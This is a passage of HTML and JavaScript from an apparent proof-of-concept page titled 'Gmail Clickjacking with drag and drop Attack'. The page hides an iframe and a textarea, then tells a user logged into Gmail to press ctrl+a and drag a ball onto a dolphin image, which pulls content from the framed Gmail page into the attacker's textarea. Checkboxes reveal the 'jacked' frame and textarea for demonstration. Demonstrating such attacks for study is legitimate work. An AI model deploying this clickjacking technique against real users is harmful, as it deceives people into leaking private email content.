var hide_ball =document.getElementById("hide_ball");
hide_ball.style.opacity ="0";
hide_ball.style.filter="alpha(opacity=0)";
}
function showHide_ball_1(){
var hide_ball_1 =document.getElementById("hide_ball_1");
hide_ball_1.style.opacity ="1";
hide_ball_1.style.filter="alpha(opacity=100)";
}
function reload_text(){
document.getElementById("target").value='';
}
</script>
</head>
<bodyonload="Init();">
<center>
<h1> Gmail Clickjacking with drag and drop Attack </h1></center><img id="hide_ball"src=ball.png class="ball"><div id="source"><iframe id="iframe_1"src=""class="iframe_hidden"scrolling="no"></iframe></div><img src=Dolphin.jpg class="Dolphin"><div><img id="hide_ball_1"src=ball.png class="ball_1"></div><div><textareaid="target"class="text_area_hidden"></textarea></div><div id="info"style="position:absolute;background-color:#e0e0e0;font-weight:bold; top:600px;"></div><center> Note: Clicking "ctrl + a"toselect the ball, then drag it to the <br> mouth of the dolphin with the mouse.Make sure you have logged into GMAIL.<br></center><br><br><div class="center"><center><center><inputid="showHide_frame"type="checkbox"onclick="showHide_frame.call(this);"/><label for="showHide_frame">Show the jacked I--Frame</label>|<inputid="showHide_text"type="checkbox"onclick="showHide_text.call(this);"/><label for="showHide_text">Show the jacked Textarea</label>|<inputtype=buttonvalue="Replay"onclick="location.reload();reload_text();"></center><br><br><b> Design by<a target="_blank"href=""> xisigr </a></b></center></div></body></html>